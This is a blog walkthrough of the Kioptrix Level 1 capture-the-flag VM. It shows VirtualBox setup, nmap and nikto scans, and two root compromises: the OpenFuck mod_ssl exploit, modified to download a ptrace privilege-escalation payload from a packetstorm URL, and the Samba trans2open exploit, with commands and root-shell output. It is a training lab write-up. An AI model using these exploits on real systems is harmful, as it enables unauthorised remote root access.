CTF Walkthrough: Kioptrix Level 1

Posted on By PaulPosted in CTF, Penetration Testing, Security, VulnHub

A friend suggested I check out the Kioptrix series of challenges, so here’s how I got into Kioptrix Level 1.

This time, I am going to say something about getting it running, because this challenge is a little older and was set up to run in VMware, not VirtualBox. (Nothing against VMware, I just don’t have it set up.)

So once you download and unpack the rar file, you have to manually create a new VM in VirtualBox, using the VMDK as the hard disk (or use no disk, doesn’t matter). Before you can boot it (you will get a kernel panic otherwise), you need to change a few settings in VirtualBox.

  1. Open the settings window for your newly created VM.
  2. Storage: Right click and remove the SATA controller, and then right click and add a Hard Disk to the IDE controller, selecting the Kioptrix VMDK file.
  3. Audio: Uncheck the “Enable Audio” box.
  4. System: Change “Pointing Device” to “PS/2 Mouse”.
  5. USB: Uncheck the “Enable USB Controller” box.
  6. Network: Click on “Advanced”, then change the adapter type to “PCnet-PCI II (Am79c970A)”. I then changed mine to bridged here, so it was accessible on my network, you do what you normally would for your challenges.

You should be able to boot up the VM now without any problems.

Once it’s booted, find the IP address in your normal way, and then we can start!

The goal here is to get root, and there are apparently multiple ways in, so I’m gonna see how many I can find.

First, you guessed it, nmap scan:

root@kali:~# nmap -sS -T5 10.13.37.242 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-05 19:43 EST
Warning: 10.13.37.242 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.13.37.242
Host is up (0.00032s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:9F:74:81 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 864.04 seconds

Got a few things to work with here. Let’s run nikto on port 80.

root@kali:~# nikto -host 10.13.37.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.13.37.242
+ Target Hostname: 10.13.37.242
+ Target Port: 80
+ Start Time: 2017-11-06 07:35:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2017-11-06 07:36:12 (GMT-5) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Well, the words “remote shell” jumped out at me pretty quickly. So let’s see what exploid-db.com has in store for us.

Nice, so let’s download this exploit and compile it.

NOTE: This is an older exploit, so there will be some modifications needed to the source code. Also, you may need to install the libssl1.0-dev and libssl-dev packages.

root@kali:/tmp# apt-get install libssl-dev libssl1.0-dev

You will also need to make the following changes to the c source file. First, add the two headers:

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for “wget” in the file and replace the URL that it’s downloading with the following (the old one isn’t there any more):

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Change line 961 to read:

const unsigned char *p, *end;

And then compile the exploit with the “lcrypto” flag.

gcc -o OpenFuck 764.c -lcrypto

Running OpenFuck shows us a whole slew of options…

root@kali:/tmp# ./OpenFuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./OpenFuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)

Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
.
.
.

So let’s narrow it down…

root@kali:/tmp# ./OpenFuck | grep "1.3.20"
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)

Well, we’re running a RedHat distro, so let’s go with those. (The first failed, so onto the second one.)

root@kali:/tmp# ./OpenFuck 0x6b 10.13.37.242

After it overflows and gets a shell under the “apache” user, OpenFuck downloads another exploit (remember that link you changed in the source?) that allows the code to get root. And viola!

If you like, poke around, maybe check the mail, but when you’re done, come on back, we’re gonna try to find other ways in to this system!

Now I think it’s time for a little enumeration.

root@kali:~# enum4linux 10.13.37.242 > /tmp/kioptrix_enum.txt

Looking through the file I see Samba version 2.2.1a, so I’ll search for exploits for that version.

The first result looks promising:

https://www.exploit-db.com/exploits/10/

Download, compile (no changes necessary this time), and run it against our target. Then boom, root shell.

root@kali:/tmp# gcc 10.c -o sambal
root@kali:/tmp# ./sambal -b 0 10.13.37.242
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

As for the other services (especially SSH), it looks like this is out of date enough that the ciphers don’t match between server and client, and is too much of a rabbit hole for me to go down right now. Maybe someday I’ll come back to it, but that day is not today. On to another challenge!